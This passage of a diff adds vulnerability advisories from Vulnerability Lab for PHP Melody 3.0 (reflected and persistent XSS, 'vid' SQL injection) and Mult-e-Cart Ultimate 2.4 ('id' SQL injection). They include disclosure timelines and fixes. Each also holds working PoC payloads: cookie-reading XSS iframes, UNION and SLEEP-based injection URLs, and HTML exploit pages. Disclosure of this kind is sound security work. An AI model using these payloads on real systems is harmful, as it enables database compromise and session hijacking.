melody_d900e07810ba03257e53baf46a9ada6f=admin; melody_key_d900e07810ba03257e53baf46a9ada6f=cc33e6eb60d2c1e31a5612bd8c193c88;
|
||||
cookieconsent_dismissed=yes; sidebar-main-state=maxi; watched_video_list=MSw0LDUsNywy;
|
||||
pm_elastic_player=normal; aa_import_from=youtube; guest_name_d900e07810ba03257e53baf46a9ada6f=admin
|
||||
-
|
||||
GET: HTTP/2.0 200 OK
|
||||
content-type: text/html; charset=utf-8
|
||||
x-powered-by: PHP/5.4.34
|
||||
|
||||
|
||||
--- PoC Session Logs (GET) (username) ---
|
||||
https://phpmelody.localhost:8080/admin/import-user.php?action=search&username="><iframe src=evil.source onload=alert(document.cookie)>&results=50&autofilling=0&autodata=1&oc=1&utc=19&data_source=youtube&sub_id=24&page=1
|
||||
Host: phpmelody.localhost:8080
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Connection: keep-alive
|
||||
Cookie: PHPSESSID=acf50832ffd23b7d11815fa2b8f2e17u;
|
||||
melody_d900e07810ba03257e53baf46a9ada6f=admin; melody_key_d900e07810ba03257e53baf46a9ada6f=cc33e6eb60d2c1e31a5612bd8c193c88;
|
||||
cookieconsent_dismissed=yes; sidebar-main-state=maxi; watched_video_list=MSw0LDUsNywy;
|
||||
pm_elastic_player=normal; aa_import_from=youtube; guest_name_d900e07810ba03257e53baf46a9ada6f=admin
|
||||
-
|
||||
GET: HTTP/2.0 200 OK
|
||||
content-type: text/html; charset=utf-8
|
||||
x-powered-by: PHP/5.4.34
|
||||
|
||||
|
||||
Vulnerable Source: Categories.php (type=genre&id=1&moved)
|
||||
<div class="alert alert-success alert-styled-left"><button type="button" class="close" data-dismiss="alert"
|
||||
aria-label="Close"><span aria-hidden="true">×</span></button>
|
||||
Category<strong>Film & animation</strong> moved "><iframe src="evil.source" onload="alert(document.cookie)"> a level.</div>
|
||||
<div id="display_result" style="display:none;"></div>
|
||||
|
||||
|
||||
Vulnerable Source: Import Videos from User (action=search&username)
|
||||
<div class="card">
|
||||
<div class="card-body">
|
||||
<h5 class="mb-3">Username</h5>
|
||||
<div class="d-block">
|
||||
<form name="import-user-search-form" id="import-user-search-form" action="" method="post" class="">
|
||||
<div class="input-group mb-3">
|
||||
<div class="form-group-feedback form-group-feedback-left">
|
||||
<input name="username" type="text" class="form-control form-control-lg alpha-grey gautocomplete" value=""><iframe src="evil.source" onload="alert(document.cookie)">"
|
||||
placeholder="Enter username or Channel ID" autocomplete="yt-username" />
|
||||
<div class="form-control-feedback form-control-feedback-lg">
|
||||
<i class="icon-search4 text-muted"></i>
|
||||
</div></div>
|
||||
<div class="input-group-append">
|
||||
<select name="data_source" class="form-field alpha-grey custom-select custom-select-lg">
|
||||
<option value="youtube" selected="selected">Youtube User</option>
|
||||
<option value="youtube-channel" >Youtube Channel</option>
|
||||
<option value="dailymotion" >Dailymotion User</option>
|
||||
<option value="vimeo" >Vimeo User</option>
|
||||
</select></div>
|
||||
<div class="input-group-append">
|
||||
<button type="submit" name="submit" class="btn btn-primary btn-lg" id="search-user-btn">Search</button>
|
||||
</div></div>
|
||||
|
||||
|
||||
Reference(s):
|
||||
https://phpmelody.localhost.com:8080/admin/
|
||||
https://phpmelody.localhost.com:8080/admin/import.php
|
||||
https://phpmelody.localhost.com:8080/admin/categories.php
|
||||
https://phpmelody.localhost.com:8080/admin/import-user.php
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
The vulnerabilities can be resolved by the following steps ...
|
||||
1. Encode, escape or filter the vulnerable move, keyword and username parameters in the get method requests
|
||||
2. Restrict all the transmitted parameters by disallowing the usage of special chars
|
||||
3. Sanitize the status message and error message output to prevent the execution points
|
||||
4. Alternativ setup security headers and a web firewall or filter to prevent further exploitation
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
|
||||
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
|
||||
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
|
||||
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
|
||||
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
|
||||
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
|
||||
|
||||
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
|
||||
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
|
||||
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
|
||||
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
|
||||
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
|
||||
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
|
||||
edit our material contact (admin@ or research@) to get a ask permission.
|
||||
|
||||
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY (VULNERABILITY LAB)
|
||||
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
|
||||
LUDWIG-ERHARD STRAßE 4
|
||||
34131 KASSEL - HESSEN
|
||||
DEUTSCHLAND (DE)
|
214
exploits/php/webapps/50487.txt
Normal file
214
exploits/php/webapps/50487.txt
Normal file
|
@ -0,0 +1,214 @@
|
|||
# Exploit Title: PHP Melody 3.0 - 'vid' SQL Injection
|
||||
# Date: 2021-10-20
|
||||
# Exploit Author: Vulnerability Lab
|
||||
# Vendor Homepage: https://www.phpsugar.com/phpmelody.html
|
||||
# Version: v3
|
||||
|
||||
Document Title:
|
||||
===============
|
||||
PHP Melody v3.0 - (vid) SQL Injection Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
https://www.vulnerability-lab.com/get_content.php?id=2295
|
||||
|
||||
Bulletin: https://www.phpsugar.com/blog/2021/09/php-melody-3-0-vulnerability-report-fix/
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2021-10-20
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
2295
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
7
|
||||
|
||||
|
||||
Vulnerability Class:
|
||||
====================
|
||||
SQL Injection
|
||||
|
||||
|
||||
Current Estimated Price:
|
||||
========================
|
||||
1.000€ - 2.000€
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
Upload, import, stream or embed any media. The smart way to manage audio & video. Comes with all the tools you need for online publishing.
|
||||
Beautiful content for your site. Allow users to create their channels, subscribe and follow the content they like. Podcast, mini-series,
|
||||
TV shows or movies. Everything is easier to publish with our CMS. Invest in a Secure Foundation. Build with a proven CMS.
|
||||
|
||||
(Copy of the Homepage: https://www.phpsugar.com/phpmelody.html )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The vulnerability laboratory core research team discovered a remote sql-injection web vulnerability in the PHP Melody v3.0 video cms web-application.
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
PHPSUGAR
|
||||
Product: PHP Melody v3.0 - Video CMS (Web-Application)
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2021-09-01: Researcher Notification & Coordination (Security Researcher)
|
||||
2021-09-02: Vendor Notification (Security Department)
|
||||
2021-09-04: Vendor Response/Feedback (Security Department)
|
||||
2021-09-22: Vendor Fix/Patch (Service Developer Team)
|
||||
2021-09-22: Security Acknowledgements (Security Department)
|
||||
2021-10-20: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
High
|
||||
|
||||
|
||||
Authentication Type:
|
||||
====================
|
||||
Full Authentication (Admin/Root Privileges)
|
||||
|
||||
|
||||
User Interaction:
|
||||
=================
|
||||
No User Interaction
|
||||
|
||||
|
||||
Disclosure Type:
|
||||
================
|
||||
Responsible Disclosure
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A remote sql-injection vulnerability has been discovered in the PHP Melody v3.0 video cms web-application.
|
||||
The vulnerability allows remote attackers to inject or execute own sql commands to compromise the dbms or
|
||||
file system of the web-application.
|
||||
|
||||
The remote sql injection vulnerability is located in the `vid` parameter of the `edit-video.php` file.
|
||||
Remote attackers with moderator or admin access privileges are able to execute own malicious sql commands
|
||||
by inject get method request. The vid parameter in the acp ui is not sanitized properly. Thus allows an
|
||||
attacker to inject own sql commands to compromise the web-application and dbms.
|
||||
|
||||
Exploitation of the remote sql injection vulnerability requires no user interaction but a privileged moderator or admin account.
|
||||
Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.
|
||||
|
||||
Request Method(s):
|
||||
[+] GET
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] Video Edit
|
||||
|
||||
Vulnerable File(s):
|
||||
[+] edit-video.php
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] vid
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The remote sql-injection web vulnerability can be exploited by authenticated remote attackers without user interaction.
|
||||
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
|
||||
Original:
|
||||
https://phpmelody.localhost:8000/admin/edit-video.php?vid=3435b47dd&a=4&page=1&filter=added&fv=desc
|
||||
|
||||
|
||||
PoC: Exploitation #1
|
||||
https://phpmelody.localhost:8000/admin/edit-video.php?vid=-3435b47dd' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,
|
||||
CONCAT(0x7171766b71,0x5642646a536b77547366574a4c43577866565270554f56426b6175535a55764259514b6c486e6e69,0x71626a6271),
|
||||
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
|
||||
|
||||
|
||||
PoC: Exploitation #2
|
||||
https://phpmelody.localhost:8000/admin/edit-video.php?vid=3435b47dd-' AND (SELECT 1446 FROM (SELECT(SLEEP([SLEEPTIME])))--
|
||||
|
||||
|
||||
PoC: Exploit
|
||||
<html>
|
||||
<head><body>
|
||||
<title>phpmelody vid sql injection poc</title>
|
||||
<iframe src="https://phpmelody.localhost:8000/admin/edit-video.php?vid=-3435b47dd' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,
|
||||
CONCAT(0x7171766b71,0x5642646a536b77547366574a4c43577866565270554f56426b6175535a55764259514b6c486e6e69,0x71626a6271),
|
||||
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--">
|
||||
<br>
|
||||
<iframe src="https://phpmelody.localhost:8000/admin/edit-video.php?vid=3435b47dd-' AND (SELECT 1446 FROM (SELECT(SLEEP([SLEEPTIME])))--">
|
||||
</body></head>
|
||||
</html>
|
||||
|
||||
|
||||
Reference(s):
|
||||
https://phpmelody.localhost:8000/
|
||||
https://phpmelody.localhost:8000/admin/
|
||||
https://phpmelody.localhost:8000/admin/edit-video.php
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
The vulnerability can be resolved by the following steps ...
|
||||
1. Use a prepared statement to build the query
|
||||
2. Restrict the parameter input to disallow special chars
|
||||
3. Escape and encode the content to prevent execution of malicious payloads
|
||||
4. Alternativ it is possible to integrate a web firewall or filter class to block further attacks.
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
|
||||
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
|
||||
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
|
||||
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
|
||||
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
|
||||
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
|
||||
|
||||
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
|
||||
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
|
||||
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
|
||||
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
|
||||
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
|
||||
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
|
||||
edit our material contact (admin@ or research@) to get a ask permission.
|
||||
|
||||
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY (VULNERABILITY LAB)
|
||||
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
|
||||
LUDWIG-ERHARD STRAßE 4
|
||||
34131 KASSEL - HESSEN
|
||||
DEUTSCHLAND (DE)
|
214
exploits/php/webapps/50488.txt
Normal file
214
exploits/php/webapps/50488.txt
Normal file
|
@ -0,0 +1,214 @@
|
|||
# Exploit Title: PHP Melody 3.0 - Persistent Cross-Site Scripting (XSS)
|
||||
# Date: 2021-10-21
|
||||
# Exploit Author: Vulnerability Lab
|
||||
# Vendor Homepage: https://www.phpsugar.com/phpmelody.html
|
||||
|
||||
Document Title:
|
||||
===============
|
||||
PHP Melody v3.0 - (Editor) Persistent XSS Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
https://www.vulnerability-lab.com/get_content.php?id=2291
|
||||
|
||||
Bulletin: https://www.phpsugar.com/blog/2021/09/php-melody-3-0-vulnerability-report-fix/
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2021-10-21
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
2291
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
5.4
|
||||
|
||||
|
||||
Vulnerability Class:
|
||||
====================
|
||||
Cross Site Scripting - Persistent
|
||||
|
||||
|
||||
Current Estimated Price:
|
||||
========================
|
||||
500€ - 1.000€
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
Upload, import, stream or embed any media. The smart way to manage audio & video. Comes with all the tools you need for online publishing.
|
||||
Beautiful content for your site. Allow users to create their channels, subscribe and follow the content they like. Podcast, mini-series,
|
||||
TV shows or movies. Everything is easier to publish with our CMS. Invest in a Secure Foundation. Build with a proven CMS.
|
||||
|
||||
(Copy of the Homepage: https://www.phpsugar.com/phpmelody.html )
|
||||
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The vulnerability laboratory core research team discovered a persistent cross site web vulnerability in the PHP Melody v3.0 video cms web-application.
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
PHPSUGAR
|
||||
Product: PHP Melody v3.0 - Video CMS (Web-Application)
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2021-09-01: Researcher Notification & Coordination (Security Researcher)
|
||||
2021-09-02: Vendor Notification (Security Department)
|
||||
2021-09-04: Vendor Response/Feedback (Security Department)
|
||||
2021-09-22: Vendor Fix/Patch (Service Developer Team)
|
||||
2021-09-22: Security Acknowledgements (Security Department)
|
||||
2021-10-20: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
Medium
|
||||
|
||||
|
||||
Authentication Type:
|
||||
====================
|
||||
Restricted Authentication (Moderator Privileges)
|
||||
|
||||
|
||||
User Interaction:
|
||||
=================
|
||||
Low User Interaction
|
||||
|
||||
|
||||
Disclosure Type:
|
||||
================
|
||||
Responsible Disclosure
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A persistent input validation web vulnerability has been discovered in PHP Melody v3.0 video cms web-application.
|
||||
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to
|
||||
compromise browser to web-application requests from the application-side.
|
||||
|
||||
The persistent cross site web vulnerability is located in the video editor (WYSIWYG) with the tinymce class.
|
||||
Privileged user accounts like edtiors are able to inject own malicious script code via editor to provoke a
|
||||
public execution by users oder administrators. The request method to inject is get and after save in dbms
|
||||
via post method the attack vector becomes persistent.
|
||||
|
||||
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent
|
||||
external redirects to malicious source and persistent manipulation of affected application modules.
|
||||
|
||||
Request Method(s):
|
||||
[+] POST
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] Editor - Videos (WYSIWYG - tinymce)
|
||||
|
||||
Vulnerable File(s):
|
||||
[+] edit-episode.php
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] episode_id
|
||||
|
||||
Affected Module(s):
|
||||
[+] description
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The persistent validation vulnerability can be exploited by remote attackers with privileged editor user account and with low user interaction.
|
||||
For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
PoC: Payload
|
||||
<p><a title=""><iframe src="//phpmelody.localhost.com:8080/admin/[PWND]">">">"
|
||||
href="https://phpmelody.localhost.com:8080/admin/"><iframe%20src=evil.source onload=alert(document.cookie)>">">">">"></iframe></a></p>
|
||||
|
||||
|
||||
--- PoC Session Logss (GET) [WYSIWYG] ---
|
||||
https://phpmelody.localhost.com:8080/admin/[PWND]
|
||||
Host: phpmelody.localhost.com:8080
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Connection: keep-alive
|
||||
Referer: https://phpmelody.localhost.com:8080/admin/edit-episode.php?episode_id=1
|
||||
Cookie: PHPSESSID=aac20732ffd23b7d11815fa2b8f2e12a; melody_d900e07810ba03257e53baf46a9ada6f=admin;
|
||||
melody_key_d900e07810ba03257e53baf46a9ada6f=cc33e6eb60d2c1e31a5612bd8c193c88;
|
||||
cookieconsent_dismissed=yes; sidebar-main-state=maxi; watched_video_list=MSw0LDUsNw%3D%3D;
|
||||
pm_elastic_player=normal; aa_import_from=youtube; guest_name_d900e07810ba03257e53baf46a9ada6f=admin
|
||||
-
|
||||
GET: HTTP/2.0 200 OK
|
||||
content-type: text/html;
|
||||
vary: Accept-Encoding
|
||||
|
||||
|
||||
Vulnerable Source: Video Editor (WYSIWYG - tinymce)
|
||||
<textarea name="description" cols="100" id="textarea-WYSIWYG" class="tinymce" style="display: none;"
|
||||
aria-hidden="true"><p><test title=""><iframe src="//phpmelody.localhost.com:8080/admin/evil.source">">">"
|
||||
href="https://phpmelody.localhost.com:8080/admin/"><iframe%20src=evil.source onload=alert(document.cookie)>">">">">"></iframe></a></p></textarea>
|
||||
<span class="autosave-message"></span>
|
||||
</div></div>
|
||||
|
||||
|
||||
Reference(s):
|
||||
https://phpmelody.localhost.com:8080/admin/
|
||||
https://phpmelody.localhost.com:8080/admin/edit-episode.php
|
||||
https://phpmelody.localhost.com:8080/admin/edit-episode.php?episode_id=1
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
Encode and sanitize the input description parameter of the web editor tinymce class for moderators, editors or users to prevent attacks.
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
|
||||
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
|
||||
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
|
||||
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
|
||||
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
|
||||
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
|
||||
|
||||
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
|
||||
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
|
||||
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
|
||||
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
|
||||
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
|
||||
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
|
||||
edit our material contact (admin@ or research@) to get a ask permission.
|
||||
|
||||
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY (VULNERABILITY LAB)
|
||||
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
|
||||
LUDWIG-ERHARD STRAßE 4
|
||||
34131 KASSEL - HESSEN
|
||||
DEUTSCHLAND (DE)
|
264
exploits/php/webapps/50489.txt
Normal file
264
exploits/php/webapps/50489.txt
Normal file
|
@ -0,0 +1,264 @@
|
|||
# Exploit Title: Mult-e-Cart Ultimate 2.4 - 'id' SQL Injection
|
||||
# Date: 2021-10-22
|
||||
# Exploit Author: Vulnerability Lab
|
||||
# Vendor Homepage: https://multecart.com/
|
||||
# Version: 2.4
|
||||
|
||||
Document Title:
|
||||
===============
|
||||
Mult-e-Cart Ultimate v2.4 - SQL Injection Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
https://www.vulnerability-lab.com/get_content.php?id=2306
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2021-10-22
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
2306
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
7
|
||||
|
||||
|
||||
Vulnerability Class:
|
||||
====================
|
||||
SQL Injection
|
||||
|
||||
|
||||
Current Estimated Price:
|
||||
========================
|
||||
1.000€ - 2.000€
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
Digital Multivendor Marketplace Online Store - eShop CMS
|
||||
|
||||
(Source: https://ultimate.multecart.com/ & https://www.techraft.in/ )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The vulnerability laboratory core research team discovered multiple sql-injection web vulnerabilities in the Mult-e-Cart Ultimate v2.4 (v2021) web-application.
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
Techraft
|
||||
Product: Digital Multivendor Marketplace Online Store v2.4 - eShop CMS (Web-Application)
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2021-10-22: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
High
|
||||
|
||||
|
||||
Authentication Type:
|
||||
====================
|
||||
Restricted Authentication (Moderator Privileges)
|
||||
|
||||
|
||||
User Interaction:
|
||||
=================
|
||||
No User Interaction
|
||||
|
||||
|
||||
Disclosure Type:
|
||||
================
|
||||
Independent Security Research
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
Multiple classic sql-injection web vulnerabilities has been discovered in the Mult-e-Cart Ultimate v2.4 (v2021) web-application.
|
||||
The web vulnerability allows remote attackers to inject or execute own sql commands to compromise the database management system.
|
||||
|
||||
The vulnerabilities are located in the `id` parameter of the `view` and `update` function. The vulnerable modules are `inventory`,
|
||||
`customer`, `vendor` and `order`. Remote attackers with a vendor shop account are able to exploit the vulnerable id parameter to
|
||||
execute malicious sql commands. The request method to inject is get and the attack vector is located on the client-side. The remote
|
||||
vulnerability is a classic order by sql-injection. The issue is exploitable with one of the two vendor roles or higher privileged
|
||||
roles like admin.
|
||||
|
||||
Exploitation of the remote sql injection vulnerabilities requires no user interaction and a privileged vendor- or admin role user account.
|
||||
Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.
|
||||
|
||||
Request Method(s):
|
||||
[+] GET
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] inventory/inventory/update
|
||||
[+] /customer/customer/view
|
||||
[+] /vendor/vendor/view
|
||||
[+] /order/sub-order/view-order
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] id
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The remote sql injection web vulnerabilities can be exploited by remote attackers with privileged backend panel access without user interaction.
|
||||
For security demonstration or to reproduce the remote sql-injection web vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
|
||||
PoC: Payloads
|
||||
1' union select 1,2,3,4,@@version--&edit=t
|
||||
1' union select 1,2,3,4,@@database--&edit=t
|
||||
|
||||
|
||||
PoC: Exploitation
|
||||
https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 1,2,3,4,5--&edit=t
|
||||
https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 1,2,3,4,5--&edit=t
|
||||
https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 1,2,3,4,5--&edit=t
|
||||
https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 1,2,3,4,5
|
||||
-
|
||||
https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 1,2,3,4,5&edit=t
|
||||
https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 1,2,3,4,5&edit=t
|
||||
https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 1,2,3,4,5&edit=t
|
||||
https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 1,2,3,4,5
|
||||
|
||||
|
||||
PoC: Exploit
|
||||
<html>
|
||||
<head><body>
|
||||
<title>Mult-E-Cart Ultimate - SQL Injection PoC</title>
|
||||
<iframe="https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 1,2,3,4,@@database--&edit=t" width="400" height="400"><br>
|
||||
<iframe="https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 1,2,3,4,@@database--&edit=t" width="400" height="400"><br>
|
||||
<iframe="https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 1,2,3,4,@@database--&edit=t" width="400" height="400"><br>
|
||||
<iframe="https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 1,2,3,4,@@database--" width="400" height="400"><br>
|
||||
<br>
|
||||
<iframe="https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 1,2,3,4,@@version--&edit=t" width="400" height="400"><br>
|
||||
<iframe="https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 1,2,3,4,@@version--&edit=t" width="400" height="400"><br>
|
||||
<iframe="https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 1,2,3,4,@@version--&edit=t" width="400" height="400"><br>
|
||||
<iframe="https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 1,2,3,4,@@version--" width="400" height="400">
|
||||
</body></head>
|
||||
</html>
|
||||
|
||||
|
||||
--- SQL Error Exception Handling Logs ---
|
||||
SQLSTATE[42S22]: Column not found: 1054 Unknown column '100' in 'order clause'
|
||||
The SQL being executed was: SELECT * FROM `tbl_inventory` WHERE id=1 order by 100--
|
||||
-
|
||||
PDOException: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax;
|
||||
